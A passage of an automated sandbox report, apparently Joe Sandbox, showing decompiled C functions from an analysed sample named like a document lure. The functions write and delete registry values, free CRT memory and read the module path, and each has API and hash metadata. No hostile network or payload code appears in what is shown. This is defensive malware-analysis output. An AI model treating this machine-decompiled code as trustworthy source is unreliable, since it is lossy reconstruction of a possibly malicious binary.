    											_t169 = E00EA297D(_t197, _v4380, _t240, _t242);
    											goto L33;
    										}
    										__eflags = _v4384;
    										if(_v4384 == 0) {
    											goto L32;
    										}
    										_v4416 = 0;
    										_v4412 = 0;
    										_v4408 = 0;
    										_t179 = E00EA1629( &_v4416, _v4388, 0, 0x20006);
    										__eflags = _t179;
    										if(_t179 != 0) {
    											L84:
    											_t180 = E00EA12D7(_t179);
    											__eflags = _v4416;
    											_t245 = _t180;
    											if(_v4416 != 0) {
    												RegCloseKey(_v4416);
    											}
    											goto L87;
    										}
    										_t250 = _v4416;
    										_t179 = RegDeleteValueA(_t250,  &_v4376);
    										__eflags = _t179;
    										if(_t179 == 0) {
    											L29:
    											__eflags = _t250;
    											if(_t250 != 0) {
    												RegCloseKey(_t250);
    												_t59 =  &_v4416;
    												 *_t59 = _v4416 & 0x00000000;
    												__eflags =  *_t59;
    											}
    											_t61 =  &_v4412;
    											 *_t61 = _v4412 & 0x00000000;
    											__eflags =  *_t61;
    											goto L32;
    										}
    										__eflags = _t179 - 2;
    										if(_t179 != 2) {
    											goto L84;
    										}
    										goto L29;
    									}
    									_v8 = 1;
    									_v4440 = _v4440 & 0x00000000;
    									_v4436 = _v4436 & 0x00000000;
    									_v4444 = _v4388;
    									_t245 = E00EA2440(_v4380,  &_v4444,  &_v4376, _t242);
    									_v4444 = 0;
    									_v4440 = 0;
    									_v4436 = 0;
    									__eflags = _t245;
    									if(_t245 < 0) {
    										goto L87;
    									}
    									_v8 = 0;
    									_v4440 = 0;
    									goto L53;
    								}
    								_v4384 = _t248;
    								_t245 = E00EA2327(_v4380, _t242);
    								__eflags = _t245;
    								if(_t245 < 0) {
    									goto L87;
    								}
    								goto L17;
    							}
    							_t240 = 0x5c;
    							_v4432 = 0;
    							_v4424 = 0;
    							_t190 = E00EA22D6(_t242, 0x5c);
    							__eflags = _t190;
    							if(_t190 != 0) {
    								goto L86;
    							} else {
    								__eflags = E00EA2919(_t242);
    								if(__eflags != 0) {
    									_v4432 = _v4388;
    									_v4428 = 0;
    									E00EA1685( &_v4432, 0x5c, _t242, __eflags, _t242);
    									_v4432 = 0;
    									_v4424 = 0;
    								}
    								__eflags = _v4392 - _t248;
    								if(_v4392 == _t248) {
    									_v4428 = _t248;
    									goto L15;
    								}
    								_t245 = E00EA2327(_v4380, _t242);
    								__eflags = _t245;
    								if(_t245 < 0) {
    									goto L87;
    								}
    								_t245 = E00EA297D(_t197, _v4380, _t240, _t242);
    								__eflags = _t245;
    								if(_t245 < 0) {
    									goto L87;
    								}
    								_v4428 = _v4428 & 0x00000000;
    								goto L53;
    							}
    						}
    						__eflags = _t247;
    						if(_t247 == 0) {
    							_t248 = 0;
    							__eflags = 0;
    							goto L15;
    						}
    						goto L4;
    					}
    					goto L87;
    				}
    			}

    APIs
      • Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA235A
      • Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA236A
      • Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA2379
      • Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA2383
      • Part of subcall function 00EA2327: CharNextA.USER32(?,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA23D5
    • lstrcmpiA.KERNEL32 ref: 00EA2E26
    • lstrcmpiA.KERNEL32(?,ForceRemove), ref: 00EA2E3D
    • _strlen.LIBCMT ref: 00EA31AE
    • RegCloseKey.ADVAPI32(00000000,?), ref: 00EA33DE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: CharNext$lstrcmpi$Close_strlen
    • String ID: Delete$ForceRemove$NoRemove$Val
    • API String ID: 3980308911-1781481701
    • Opcode ID: 690fd1aa92b5d6d020090d526560bdea087e275d0de7601b2e3b6a3669c63f02
    • Instruction ID: e93e7b87e75829283af6df77aa21b3f9926469f873752fe8d65061f86d6dfdd6
    • Opcode Fuzzy Hash: 690fd1aa92b5d6d020090d526560bdea087e275d0de7601b2e3b6a3669c63f02
    • Instruction Fuzzy Hash: 47F14E71D012299BCF399B658C41BEEB6B4AF4EB54F0011D9FA15BA241DB34AF84CF90
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    [Figure: control-flow graph of function 00EA2440; legend: Executed / Not Executed]
    C-Code - Quality: 87%
    			E00EA2440(int __ecx, void** _a4, char* _a8, intOrPtr _a12) {
    				int _v8;
    				char _v16;
    				intOrPtr _v20;
    				signed int _v24;
    				char _v4120;
    				char _v4376;
    				int _v4380;
    				int _v4384;
    				int _v4388;
    				char _v4392;
    				char* _v4396;
    				void** _v4400;
    				int _v4404;
    				char _v4408;
    				intOrPtr _v4412;
    				void* _v4428;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t95;
    				signed int _t96;
    				char* _t106;
    				int _t109;
    				char* _t112;
    				char* _t113;
    				signed char _t115;
    				char* _t118;
    				signed char _t124;
    				char* _t129;
    				char* _t132;
    				char* _t133;
    				intOrPtr _t134;
    				char* _t142;
    				void* _t147;
    				void* _t152;
    				long _t154;
    				CHAR* _t155;
    				char* _t157;
    				char _t158;
    				int _t162;
    				void* _t163;
    				char* _t164;
    				int _t165;
    				char* _t166;
    				char* _t179;
    				void* _t185;
    				char _t201;
    				void** _t208;
    				void* _t209;
    				char* _t214;
    				char* _t215;
    				char* _t216;
    				CHAR* _t217;
    				int _t218;
    				char* _t220;
    				void* _t221;
    				int _t223;
    				char* _t225;
    				char* _t226;
    				signed int _t227;
    				intOrPtr _t228;
    				intOrPtr _t231;
    
    				_push(0xffffffff);
    				_push(0xeb088d);
    				_push( *[fs:0x0]);
    				_push(__ecx);
    				E00EB02C0(0x1128);
    				_t95 =  *0xeb9008; // 0x64e1d101
    				_t96 = _t95 ^ _t227;
    				_v24 = _t96;
    				_push(_t96);
    				 *[fs:0x0] =  &_v16;
    				_v20 = _t228;
    				_v4404 = __ecx;
    				_t162 = 0;
    				_t208 = _a4;
    				_t220 = _a8;
    				_v4412 = _a12;
    				_v4388 = __ecx;
    				_v4400 = _t208;
    				_v4396 = _t220;
    				_v4384 = 0;
    				if(E00EA2327(__ecx,  &_v4120) >= 0) {
    					_t203 =  &_v4384;
    					if(E00EA21F6( &_v4120, _t203) != 0) {
    						E00EA22FE(_v4404);
    						_t100 = E00EA2327(_v4404,  &_v4120);
    						__eflags = _t100;
    						if(_t100 >= 0) {
    							_t106 = (_v4384 & 0x0000ffff) - 8;
    							__eflags = _t106;
    							if(_t106 == 0) {
    								_t109 = E00EA74D0( &_v4120) + 1;
    								__eflags = _t109;
    								_t164 = RegSetValueExA( *_t208, _t220, 0, 1,  &_v4120, _t109);
    								goto L62;
    							} else {
    								_t113 = _t106 - 9;
    								__eflags = _t113;
    								if(_t113 == 0) {
    									_t115 = E00EA74D0( &_v4120);
    									_v4384 = _t115;
    									__eflags = _t115 & 0x00000001;
    									if((_t115 & 0x00000001) != 0) {
    										L54:
    										_t100 = 0x80004005;
    									} else {
    										asm("cdq");
    										_v4380 = 0;
    										_t223 = _t115 - _t203 >> 1;
    										_v4392 = _t223;
    										_v8 = 4;
    										_v8 = 5;
    										__eflags = E00EA3D42(_t223) - 0x100;
    										if(__eflags <= 0) {
    											_t118 =  &_v4376;
    											_v4380 = _t118;
    										} else {
    											E00EA3D1D( &_v4380, _t223, __eflags, _t117);
    											_t118 = _v4380;
    										}
    										__eflags = _t118;
    										if(_t118 != 0) {
    											E00EA5210(_t208, _t118, _t162, _t223);
    											_v4388 = _t162;
    											__eflags = _v4384;
    											_t203 = _t162;
    											if(_v4384 > 0) {
    												_t165 = _v4384;
    												do {
    													_t124 = E00EA2256();
    													_t185 = 4;
    													 *((_t203 >> 1) + _v4380) =  *((_t203 >> 1) + _v4380) | _t124 << _t185 - ((_t203 & 0x00000001) << 0x00000002);
    													_t203 =  &(_v4388[1]);
    													_v4388 = _t203;
    													__eflags = _t203 - _t165;
    												} while (_t203 < _t165);
    												_t223 = _v4392;
    												_t162 = 0;
    												__eflags = 0;
    											}
    											_t164 = RegSetValueExA( *_v4400, _v4396, _t162, 3, _v4380, _t223);
    											__eflags = _v4380 -  &_v4376;
    											if(_v4380 !=  &_v4376) {
    												E00EA3D14( &_v4380);
    											}
    											goto L62;
    										} else {
    											E00EA3D14( &_v4380);
    											goto L54;
    										}
    									}
    								} else {
    									_t129 = _t113;
    									__eflags = _t129;
    									if(_t129 == 0) {
    										_t225 = 0;
    										_v4388 = 0;
    										_v8 = 3;
    										_t132 = E00EA74D0( &_v4120) + 1;
    										_t203 = _t132;
    										_v4384 = _t132;
    										_t133 = E00EA1181( &_v4384, _t132);
    										_t231 = _t228 + 4;
    										__eflags = _t133;
    										if(_t133 < 0) {
    											L39:
    											_t100 = 0x8007000e;
    										} else {
    											_t212 = _v4384;
    											__eflags = _v4384 - 0x400;
    											if(__eflags > 0) {
    												L35:
    												_t134 = E00EA3CD7( &_v4388, _t225, _t212);
    												_t225 = _v4388;
    											} else {
    												_t142 = E00EA11AE(0, _t212, _t212, 0, __eflags);
    												__eflags = _t142;
    												if(_t142 == 0) {
    													goto L35;
    												} else {
    													E00EB02F0(_t212);
    													_v20 = _t231;
    													_t134 = _t231;
    												}
    											}
    											_t203 =  &_v4120;
    											_t100 = E00EA121E(_t134,  &_v4120, _t212 >> 1, 3);
    											__eflags = _t100;
    											if(_t100 != 0) {
    												__imp__#277(_t100, _t162, _t162,  &_v4408);
    												_v4392 = _t100;
    												__eflags = _t100;
    												if(_t100 >= 0) {
    													_v4392 = _v4408;
    													_t164 = RegSetValueExA( *_v4400, _v4396, _t162, 4,  &_v4392, 4);
    													__eflags = _t225;
    													if(_t225 != 0) {
    														do {
    															_t214 =  *_t225;
    															_t225 = _t214;
    															E00EA7188(_t225);
    															__eflags = _t214;
    														} while (_t214 != 0);
    													}
    													goto L62;
    												} else {
    													__eflags = _t225;
    													if(_t225 != 0) {
    														do {
    															_t215 =  *_t225;
    															_t225 = _t215;
    															E00EA7188(_t225);
    															__eflags = _t215;
    														} while (_t215 != 0);
    														_t100 = _v4392;
    													}
    												}
    											} else {
    												__eflags = _t225;
    												if(_t225 != 0) {
    													do {
    														_t216 =  *_t225;
    														_t225 = _t216;
    														E00EA7188(_t225);
    														__eflags = _t216;
    													} while (_t216 != 0);
    												}
    												goto L39;
    											}
    										}
    									} else {
    										__eflags = _t129 != 0x3ff5;
    										if(_t129 != 0x3ff5) {
    											L64:
    											_t112 = E00EA2327(_v4404, _v4412);
    											__eflags = _t112;
    											_t179 =  <  ? _t112 : 0;
    											__eflags = _t179;
    											_t100 = _t179;
    										} else {
    											_t147 = E00EA74D0( &_v4120);
    											_v4380 = 0;
    											_v8 = 0;
    											_t23 = _t147 + 2; // 0x2
    											_v8 = 1;
    											__eflags = E00EA3D42(_t23) - 0x100;
    											if(__eflags <= 0) {
    												_t226 =  &_v4376;
    												_v4380 = _t226;
    											} else {
    												E00EA3D1D( &_v4380, _t220, __eflags, _t148);
    												_t226 = _v4380;
    											}
    											__eflags = _t226;
    											if(_t226 == 0) {
    												_push(0xe);
    												goto L28;
    											} else {
    												__eflags = _v4120;
    												_t217 =  &_v4120;
    												if(_v4120 != 0) {
    													do {
    														_t155 = CharNextA(_t217);
    														_t201 =  *_t217;
    														__eflags = _t201 - 0x5c;
    														if(_t201 != 0x5c) {
    															L17:
    															 *_t226 = _t201;
    															_t157 = IsDBCSLeadByte( *_t217 & 0x000000ff);
    															__eflags = _t157;
    															if(_t157 == 0) {
    																L20:
    																_t217 =  &(_t217[1]);
    																__eflags = _t217;
    																goto L21;
    															} else {
    																_t226 =  &(_t226[1]);
    																_t217 =  &(_t217[1]);
    																_t158 =  *_t217;
    																__eflags = _t158;
    																if(_t158 != 0) {
    																	 *_t226 = _t158;
    																	goto L20;
    																}
    															}
    														} else {
    															__eflags =  *_t155 - 0x30;
    															if( *_t155 != 0x30) {
    																goto L17;
    															} else {
    																 *_t226 = _t162;
    																_t217 = CharNextA(_t155);
    																goto L21;
    															}
    														}
    														goto L22;
    														L21:
    														_t226 =  &(_t226[1]);
    														__eflags =  *_t217;
    													} while ( *_t217 != 0);
    												}
    												L22:
    												 *_t226 = 0;
    												_t226 = _v4380;
    												__eflags = _t226;
    												if(_t226 != 0) {
    													_t218 = _t162;
    													_t166 = _t226;
    													do {
    														_t152 = E00EA74D0(_t166) + 1;
    														_t166 =  &(_t166[_t152]);
    														_t218 = _t218 + _t152;
    														__eflags = _t152 - 1;
    													} while (_t152 != 1);
    													_t154 = RegSetValueExA( *_v4400, _v4396, 0, 7, _t226, _t218);
    													_t226 = _v4380;
    													_t164 = _t154;
    												} else {
    													_push(0xd);
    													L28:
    													_pop(_t164);
    												}
    											}
    											__eflags = _t226 -  &_v4376;
    											if(_t226 !=  &_v4376) {
    												E00EA3D14( &_v4380);
    											}
    											L62:
    											__eflags = _t164;
    											if(_t164 == 0) {
    												goto L64;
    											} else {
    												_t100 = E00EA12D7(_t164);
    											}
    										}
    									}
    								}
    							}
    						}
    					} else {
    						_t100 = 0x80020009;
    					}
    				}
    				 *[fs:0x0] = _v16;
    				_pop(_t209);
    				_pop(_t221);
    				_pop(_t163);
    				return E00EA403C(_t100, _t163, _v24 ^ _t227, _t203, _t209, _t221);
    			}

    APIs
      • Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA235A
      • Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA236A
      • Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA2379
      • Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA2383
      • Part of subcall function 00EA2327: CharNextA.USER32(?,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA23D5
      • Part of subcall function 00EA21F6: lstrcmpiA.KERNEL32(?,00EB5EBC,?,00000000,00000000,00EA24CA,?,64E1D101,?,00000000,?,?,?,00EB088D,000000FF), ref: 00EA2209
    • _strlen.LIBCMT ref: 00EA2532
    • CharNextA.USER32(00000000,?,?,64E1D101,?,00000000,?,?,?,00EB088D,000000FF,?,00EA3194,?,00000000,?), ref: 00EA25A2
    • CharNextA.USER32(00000000,?,00EA3194,?,00000000,?,?,?,?,0002001F), ref: 00EA25B7
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: CharNext$_strlenlstrcmpi
    • String ID:
    • API String ID: 214070177-0
    • Opcode ID: f7ed691f32e3f9fc919f668c07db7789fd707be11cbc210e3ff5308c3d2b8350
    • Instruction ID: 0d6955338280d0880d5a8ba42ea1daf6ed9ac3fe42c419f15c3f1eaff8696ecc
    • Opcode Fuzzy Hash: f7ed691f32e3f9fc919f668c07db7789fd707be11cbc210e3ff5308c3d2b8350
    • Instruction Fuzzy Hash: 97D1B371D00269ABDB288B28CC416EAB7F4AF4E314F1010DDFB45BB250D734AE849F90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00EABFF1(intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _t25;
    				intOrPtr* _t26;
    				intOrPtr _t28;
    				intOrPtr* _t29;
    				intOrPtr* _t31;
    				intOrPtr* _t45;
    				intOrPtr* _t46;
    				intOrPtr* _t47;
    				intOrPtr* _t55;
    				intOrPtr* _t70;
    				intOrPtr _t74;
    
    				_t74 = _a4;
    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
    				if(_t25 != 0 && _t25 != 0xeb96e8) {
    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
    					if(_t45 != 0 &&  *_t45 == 0) {
    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
    						if(_t46 != 0 &&  *_t46 == 0) {
    							E00EA8B82(_t46);
    							E00EABBAA( *((intOrPtr*)(_t74 + 0x88)));
    						}
    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
    						if(_t47 != 0 &&  *_t47 == 0) {
    							E00EA8B82(_t47);
    							E00EABCA8( *((intOrPtr*)(_t74 + 0x88)));
    						}
    						E00EA8B82( *((intOrPtr*)(_t74 + 0x7c)));
    						E00EA8B82( *((intOrPtr*)(_t74 + 0x88)));
    					}
    				}
    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
    				if(_t26 != 0 &&  *_t26 == 0) {
    					E00EA8B82( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
    					E00EA8B82( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
    					E00EA8B82( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
    					E00EA8B82( *((intOrPtr*)(_t74 + 0x8c)));
    				}
    				E00EAC162( *((intOrPtr*)(_t74 + 0x9c)));
    				_t28 = 6;
    				_t55 = _t74 + 0xa0;
    				_v8 = _t28;
    				_t70 = _t74 + 0x28;
    				do {
    					if( *((intOrPtr*)(_t70 - 8)) != 0xeb91c0) {
    						_t31 =  *_t70;
    						if(_t31 != 0 &&  *_t31 == 0) {
    							E00EA8B82(_t31);
    							E00EA8B82( *_t55);
    						}
    						_t28 = _v8;
    					}
    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
    						_t29 =  *((intOrPtr*)(_t70 - 4));
    						if(_t29 != 0 &&  *_t29 == 0) {
    							E00EA8B82(_t29);
    						}
    						_t28 = _v8;
    					}
    					_t55 = _t55 + 4;
    					_t70 = _t70 + 0x10;
    					_t28 = _t28 - 1;
    					_v8 = _t28;
    				} while (_t28 != 0);
    				return E00EA8B82(_t74);
    			}
















    APIs
    • ___free_lconv_mon.LIBCMT ref: 00EAC035
      • Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABBC7
      • Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABBD9
      • Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABBEB
      • Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABBFD
      • Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC0F
      • Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC21
      • Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC33
      • Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC45
      • Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC57
      • Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC69
      • Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC7B
      • Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC8D
      • Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC9F
    • _free.LIBCMT ref: 00EAC02A
      • Part of subcall function 00EA8B82: HeapFree.KERNEL32(00000000,00000000,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?), ref: 00EA8B98
      • Part of subcall function 00EA8B82: GetLastError.KERNEL32(?,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?,?), ref: 00EA8BAA
    • _free.LIBCMT ref: 00EAC04C
    • _free.LIBCMT ref: 00EAC061
    • _free.LIBCMT ref: 00EAC06C
    • _free.LIBCMT ref: 00EAC08E
    • _free.LIBCMT ref: 00EAC0A1
    • _free.LIBCMT ref: 00EAC0AF
    • _free.LIBCMT ref: 00EAC0BA
    • _free.LIBCMT ref: 00EAC0F2
    • _free.LIBCMT ref: 00EAC0F9
    • _free.LIBCMT ref: 00EAC116
    • _free.LIBCMT ref: 00EAC12E
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: f584ab8ce9276c05ee41e90a1498d94a348a6ccfb3ed3ae06359b18bb8e0dd03
    • Instruction ID: 98eb31fb1cd3e541cad364dddb07e9702cae30f9d1ffbc6c99baf619744109ae
    • Opcode Fuzzy Hash: f584ab8ce9276c05ee41e90a1498d94a348a6ccfb3ed3ae06359b18bb8e0dd03
    • Instruction Fuzzy Hash: DF317A71600600DFEB20AE38D945B5673E8EF2A368F24A519E059FF192DF75BD808720
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00EA8F8C(void* __ebx, void* __edi, void* __esi, char _a4) {
    				void* _v5;
    				char _v12;
    				char _v16;
    				char _v20;
    				void* __ebp;
    				char _t55;
    				char _t61;
    				void* _t67;
    				intOrPtr _t68;
    				void* _t72;
    				void* _t73;
    
    				_t73 = __esi;
    				_t72 = __edi;
    				_t67 = __ebx;
    				_t36 = _a4;
    				_t68 =  *_a4;
    				_t77 = _t68 - 0xeb2040;
    				if(_t68 != 0xeb2040) {
    					E00EA8B82(_t68);
    					_t36 = _a4;
    				}
    				E00EA8B82( *((intOrPtr*)(_t36 + 0x3c)));
    				E00EA8B82( *((intOrPtr*)(_a4 + 0x30)));
    				E00EA8B82( *((intOrPtr*)(_a4 + 0x34)));
    				E00EA8B82( *((intOrPtr*)(_a4 + 0x38)));
    				E00EA8B82( *((intOrPtr*)(_a4 + 0x28)));
    				E00EA8B82( *((intOrPtr*)(_a4 + 0x2c)));
    				E00EA8B82( *((intOrPtr*)(_a4 + 0x40)));
    				E00EA8B82( *((intOrPtr*)(_a4 + 0x44)));
    				E00EA8B82( *((intOrPtr*)(_a4 + 0x360)));
    				_v16 =  &_a4;
    				_t55 = 5;
    				_v12 = _t55;
    				_v20 = _t55;
    				_push( &_v12);
    				_push( &_v16);
    				_push( &_v20);
    				E00EA8DB8(_t67, _t72, _t73, _t77);
    				_v16 =  &_a4;
    				_t61 = 4;
    				_v20 = _t61;
    				_v12 = _t61;
    				_push( &_v20);
    				_push( &_v16);
    				_push( &_v12);
    				return E00EA8E23(_t67, _t72, _t73, _t77);
    			}















    APIs
    • _free.LIBCMT ref: 00EA8FA2
      • Part of subcall function 00EA8B82: HeapFree.KERNEL32(00000000,00000000,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?), ref: 00EA8B98
      • Part of subcall function 00EA8B82: GetLastError.KERNEL32(?,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?,?), ref: 00EA8BAA
    • _free.LIBCMT ref: 00EA8FAE
    • _free.LIBCMT ref: 00EA8FB9
    • _free.LIBCMT ref: 00EA8FC4
    • _free.LIBCMT ref: 00EA8FCF
    • _free.LIBCMT ref: 00EA8FDA
    • _free.LIBCMT ref: 00EA8FE5
    • _free.LIBCMT ref: 00EA8FF0
    • _free.LIBCMT ref: 00EA8FFB
    • _free.LIBCMT ref: 00EA9009
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID: @
    • API String ID: 776569668-1255205553
    • Opcode ID: cd3969f1989d8ae587a739a8f4943229d536c9f391fa2887bcb57eda1b97b8f5
    • Instruction ID: d4730dcc4d1ceb3f34bb8840ed73bac11b310ff171d9e71fe98e575bbe940a63
    • Opcode Fuzzy Hash: cd3969f1989d8ae587a739a8f4943229d536c9f391fa2887bcb57eda1b97b8f5
    • Instruction Fuzzy Hash: 1021A4BA900108AFCB01EF94C981DDE7BB9FF19354F0491A6B555AF121DA31EA548B90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00EA3402(struct HINSTANCE__* __ebx, unsigned int __ecx, struct HINSTANCE__* __edx, void* __edi, void* __esi, void* __eflags) {
    				void* _t62;
    				struct HINSTANCE__* _t63;
    				struct HINSTANCE__* _t68;
    				long _t70;
    				unsigned int _t74;
    				void* _t75;
    				unsigned int _t76;
    				unsigned int _t82;
    				signed int _t84;
    				void* _t85;
    				void* _t89;
    				unsigned int _t91;
    				unsigned int _t98;
    				void* _t99;
    				unsigned int _t100;
    				struct HINSTANCE__* _t101;
    				unsigned int _t105;
    				unsigned int _t113;
    				intOrPtr _t116;
    				intOrPtr* _t135;
    				void* _t140;
    				void* _t141;
    				unsigned int _t156;
    				unsigned int _t159;
    				intOrPtr* _t160;
    				unsigned int _t162;
    				intOrPtr* _t164;
    				unsigned int _t166;
    				void* _t167;
    				void* _t169;
    				void* _t170;
    				void* _t172;
    				void* _t174;
    
    				_t119 = __ebx;
    				_push(0x96c);
    				_t62 = E00EB0216(0xeb094b, __ebx, __edi, __esi);
    				 *(_t169 - 0x94c) = __edx;
    				_t158 = __ecx;
    				_t164 =  *((intOrPtr*)(_t169 + 0xc));
    				L56();
    				 *(_t169 - 4) =  *(_t169 - 4) & 0x00000000;
    				_t63 = E00EA10C5(_t62, _t169 - 0x968);
    				if(_t63 < 0) {
    					L8:
    					_t165 = _t63;
    					goto L9;
    				} else {
    					 *((char*)(_t169 - 0x950)) = 1;
    					if(_t164 != 0) {
    						while(1) {
    							_t116 =  *_t164;
    							if(_t116 == 0) {
    								goto L5;
    							}
    							_push( *((intOrPtr*)(_t164 + 4)));
    							_push(_t116);
    							_push(_t169 - 0x978);
    							E00EA1A54(_t119, _t158, _t164, __eflags);
    							_t164 = _t164 + 8;
    						}
    					}
    					L5:
    					_t68 =  *((intOrPtr*)( *_t158 + 0x14))(_t169 - 0x978);
    					_t165 = _t68;
    					if(_t68 < 0) {
    						L9:
    						E00EA19FE(_t169 - 0x978, _t158);
    						goto L10;
    					} else {
    						_t166 = 0;
    						 *(_t169 - 0x944) = 0;
    						_t158 = 0x104;
    						 *(_t169 - 4) = 1;
    						_t119 =  *0xfe2394; // 0xea0000
    						_t70 = GetModuleFileNameA(_t119, _t169 - 0x114, 0x104);
    						if(_t70 != 0) {
    							__eflags = _t70 - 0x104;
    							if(_t70 != 0x104) {
    								 *(_t169 - 0x940) = E00EA74D0(_t169 - 0x114) + 1;
    								_t74 = E00EA1181(_t169 - 0x940, E00EA74D0(_t169 - 0x114) + 1);
    								_t172 = _t170 + 4;
    								__eflags = _t74;
    								if(_t74 < 0) {
    									L21:
    									_t165 = 0x8007000e;
    									goto L9;
